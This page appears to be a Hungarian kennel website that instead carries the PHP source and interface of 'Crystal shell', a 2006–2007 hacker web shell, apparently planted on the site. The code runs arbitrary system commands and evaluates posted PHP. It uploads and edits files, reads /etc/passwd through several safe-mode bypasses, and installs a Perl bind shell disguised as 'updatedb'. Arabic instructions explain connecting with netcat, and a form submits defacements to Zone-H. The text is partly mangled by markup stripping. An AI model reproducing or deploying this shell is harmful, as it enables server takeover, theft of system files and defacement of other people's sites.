Ausztria 2005 ClubMoonflower Celtic Girls6 hetes kölykökMoonflower Hause ReginaCsaládi albumból
MagyarEnglishDeutsch
 Crystal shell

 

ِCRYSTAL-H Crystal hack shellphp 2006-2007

ON (secure)";}else {$safemode = false; $hsafemode = "OFF (not secure)";}echo("Safe-mode: $hsafemode");// PHPINFOif ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; exit;}$v = @ini_get("open_basedir");if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}echo("
");echo("Open base dir: $hopenbasedir");echo("
");echo "PostgreSQL: ";$pg_on = @function_exists('pg_connect');if($pg_on){echo "ON";}else{echo "OFF";}echo("
");echo "MSSQL: ";$mssql_on = @function_exists('mssql_connect');if($mssql_on){echo "ON";}else{echo "OFF";}echo("
");echo "MySQL: ";$mysql_on = @function_exists('mysql_connect');if($mysql_on){echo "ON"; } else { echo "OFF"; }echo("
");echo "PHP version: ".@phpversion()."";echo("
");echo "cURL: ".(($curl_on)?("ON"):("OFF"));echo("
");echo "Disable functions : ";if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}$free = @diskfreespace($dir);if (!$free) {$free = 0;}$all = @disk_total_space($dir);if (!$all) {$all = 0;}$used = $all-$free;$used_percent = @round(100/($all/$free),2);?>

 

 

 

OS:  

Server:  

User:
1:

   Back ًphpinfo2 Tools4  Decoderi  ByPass`  SQLآ Bindآ helpsabout?

[j server : CGI v:           HTTP v:  Mailadmin:          
:  IP  SERVER:                           port :

السلام عليكم ورحمة الله وبركاته

عزيزي المستخدم
اذا اردت المساعدة اضغط على اسم الخيار الموضح باللون الازرق
وستظهر لك معلومات الخيار .";}if ($act == "bindport"){echo "
/bin/bashPort
";}if ($act == "tools"){ echo "
File to edit:
"; echo "
";echo "
Download here from:-->>:
";}if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .";}if ($act == "bind") {echo "
CRYSTAL-H:

-Connect قم بالضغط على خيار.
.- بعد مايتم انزال السكريبت بالمجلد
.-توجه لاداة النت كات وتصنت على
nc -lp 3333بكتابة المنفذ -
السكريبت بلغة البيرل
Bind port to :
bind shell وهنيئا ً لك .";}if ($act == "command") {echo "
CRYSTAL-H:

لأختيار الاوامر الجاهزه Select ------ x اضغط على الخيار
.- واذا اردت كتابه الاوامر بنفسك قد تكتفي بالخيار
Command .";}if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .";}if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif'); die(getimage($_GET['image']));}if ($act == "bypass") {echo "
Execute:
";echo (" bypass safemode with copy ");echo "
read file :
";echo (" bypass safemode with CuRl");echo "
read file :
";echo (" bypass safemode with imap()");echo "
";echo (" bypass safemode with id()");echo "
";echo (" Exploit: error_log()");echo "
";}if ($act == "decoder"){echo (" replace Chr()");echo "

";}if ($act == "SQL"){echo (" MySQL ");echo "
Username :\npassword :\n\n
";}?>

 

 

Exploit: error_log() By * Super-Crystal *
By * Super-Crystal * TrYaG Team
", 3,$ERORR);}// id //if ($_POST['plugin'] ){ switch($_POST['plugin']){ case("cat /etc/passwd"): for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "
"; } } break; } }// imap //$string = !empty($_POST['string']) ? $_POST['string'] : 0;$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;if ($string && $switch == "file") {$stream = imap_open($string, "", "");$str = imap_body($stream, 1);if (!empty($str))echo "
".$str."
";imap_close($stream);} elseif ($string && $switch == "dir") {$stream = imap_open("/etc/passwd", "", "");if ($stream == FALSE)die("Can't open imap stream");$string = explode("|",$string);if (count($string) > 1)$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));else$dir_list = imap_list($stream, trim($string[0]), "*");echo "
";for ($i = 0; $i < count($dir_list); $i++)echo "$dir_list[$i]"."
 
" ;echo "
";imap_close($stream);}// CURL //if(empty($_POST['curl'])){} else {$m=$_POST['curl'];$ch =curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);curl_exec($ch);var_dump(curl_exec($ch));}// copy//$u1p="";$tymczas="";if(empty($_POST['copy'])){} else {$u1p=$_POST['copy'];$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$u1p, $temp)){$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));fclose($zrodlo);echo "".htmlspecialchars($tekst)."";unlink($temp);} else {die("
Sorry... File".htmlspecialchars($u1p)." dosen't exists or you don't haveaccess.
");}}@$dir = $_POST['dir'];$dir = stripslashes($dir);@$cmd = $_POST['cmd'];$cmd = stripslashes($cmd);$REQUEST_URI = $_SERVER['REQUEST_URI'];$dires = '';$files = '';if (isset($_POST['port'])){$bind = "#!/usr/bin/perl\$port = {$_POST['port']};\$port = \$ARGV[0] if \$ARGV[0];exit if fork;$0 = \"updatedb\" . \" \" x100;\$SIG{CHLD} = 'IGNORE';use Socket;socket(S, PF_INET, SOCK_STREAM, 0);setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);bind(S, sockaddr_in(\$port, INADDR_ANY));listen(S, 50);while(1){ accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X;}";}function decode($buffer){return convert_cyr_string ($buffer, 'd', 'w');}function execute($com){ if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode('',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')){ echo system($com);} elseif(function_exists('passthru')) { echo passthru($com); }}}function perms($mode){if( $mode & 0x1000 ) { $type='p'; }else if( $mode & 0x2000 ) { $type='c'; }else if( $mode & 0x4000 ) { $type='d'; }else if( $mode & 0x6000 ) { $type='b'; }else if( $mode & 0x8000 ) { $type='-'; }else if( $mode & 0xA000 ) { $type='l'; }else if( $mode & 0xC000 ) { $type='s'; }else $type='u';$owner["read"] = ($mode & 00400) ? 'r' : '-';$owner["write"] = ($mode & 00200) ? 'w' : '-';$owner["execute"] = ($mode & 00100) ? 'x' : '-';$group["read"] = ($mode & 00040) ? 'r' : '-';$group["write"] = ($mode & 00020) ? 'w' : '-';$group["execute"] = ($mode & 00010) ? 'x' : '-';$world["read"] = ($mode & 00004) ? 'r' : '-';$world["write"] = ($mode & 00002) ? 'w' : '-';$world["execute"] = ($mode & 00001) ? 'x' : '-';if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';$s=sprintf("%1s", $type);$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);return trim($s);}if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== ""){copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);}if((isset($_POST['fileto']))||(isset($_POST['filefrom']))){$data = implode("", file($_POST['filefrom']));$fp = fopen($_POST['fileto'], "wb");fputs($fp, $data);$ok = fclose($fp);if($ok){$size = filesize($_POST['fileto'])/1024;$sizef = sprintf("%.2f", $size);print "
Download - OK. (".$sizef."??)
";}else{print "
Something is wrong. Download - IS NOT OK
";}}if (isset($_POST['installbind'])){if (is_dir($_POST['installpath']) == true){chdir($_POST['installpath']);$_POST['installpath'] = "temp.pl";}$fp = fopen($_POST['installpath'], "w");fwrite($fp, $bind);fclose($fp);exec("perl " . $_POST['installpath']);chdir($dir);}@$ef = stripslashes($_POST['editfile']);if ($ef){$fp = fopen($ef, "r");$filearr = file($ef);$string = '';$content = '';foreach ($filearr as $string){$string = str_replace("<" , "<" , $string);$string = str_replace(">" , ">" , $string);$content = $content . $string;}echo "
Edit file: $ef

";fclose($fp);}if(isset($_POST['savefile'])){$fp = fopen($_POST['savefile'], "w");$content = stripslashes($content);fwrite($fp, $content);fclose($fp);echo "
saved -OK!
";}if (isset($_POST['php'])){echo "
eval code

";}if(isset($_POST['phpcode'])){echo "
Results of PHP execution

";@eval(stripslashes($_POST['phpcode']));echo "
";}if ($cmd){if($sertype == "winda"){ob_start();execute($cmd);$buffer = "";$buffer = ob_get_contents();ob_end_clean();}else{ob_start();echo decode(execute($cmd));$buffer = "";$buffer = ob_get_contents();ob_end_clean();}if (trim($buffer)){echo "
Command: $cmd
";}}$arr = array();$arr = array_merge($arr, glob("*"));$arr = array_merge($arr, glob(".*"));$arr = array_merge($arr, glob("*.*"));$arr = array_unique($arr);sort($arr);echo "";foreach ($arr as $filename) {if ($filename != "." and $filename != ".."){if (is_dir($filename) == true){$directory = "";$directory = $directory . "";}else{$directory = $directory . "";}if (is_readable($filename) == true){$directory = $directory . "";}else{$directory = $directory . "";}$dires = $dires . $directory;}if (is_file($filename) == true){$file = "";$file = $file . "";}else{$file = $file . "";}if (is_readable($filename) == true){$file = $file . "";}else{$file = $file . "";}$files = $files . $file;}}}echo $dires;echo $files;echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));if (is_writable($filename) == true){$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));if (is_writable($filename) == true){$file = $file . "YesNoYes
No

";echo "
Command:Directory:
";if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
Including from here: ". ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "";}?>


< 


:: Executed command ::

Command:";?> f

 
Selectg 
Bind port toآ

::Edit/Create file::"

 التحرير والانشاء:

قم بوضع اسم الملف الذي تريد تحريره فقط
وبعد ذالك الضغط على config.php مثال
Edit
ستظهر لك نافذه بها محتويات الملف
وايضا ً اذا اردت انشاء ملف فقط ضع اسمه مع الامتداد
وبعد ذالك اكتب ماتريد washer-crystal.txt .";}?>

 

File to edit:

";?>

رفع الملفات:

قم بتحديد الملف المراد رفعه
وبعد ذالك قم بالضغط على الخيار الموضح
UPLOAD< .";}?>:: upload::Ņ

 
";?>

 Defacer Zone-H

 

CRYSTAL-H:

اسم المعلن Defacer
الموقع المخترق Victim
وضع الاختراق اي نوع الثغره التى استثمرتها Attack Mode
سبب الاختراق Attack Reason
لارسال الاختراق sand
لرؤيه اخر التحذيرات المرسله بالموقع Attacks On Hold.";}?>

Defacer Zone-h

 
::Defacer:::è
::Victim:::è
Attack Mode:è
Attack Reason:è
 
  :   L Attacks On Hold L


 yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| : Web x

 

 
CRYSTAL-H 2006
PPSCPCC
1
2 3 4 5 6 7 8
9 10 11 12 1314 15
16 17 181920 21 22
23242526272829
3031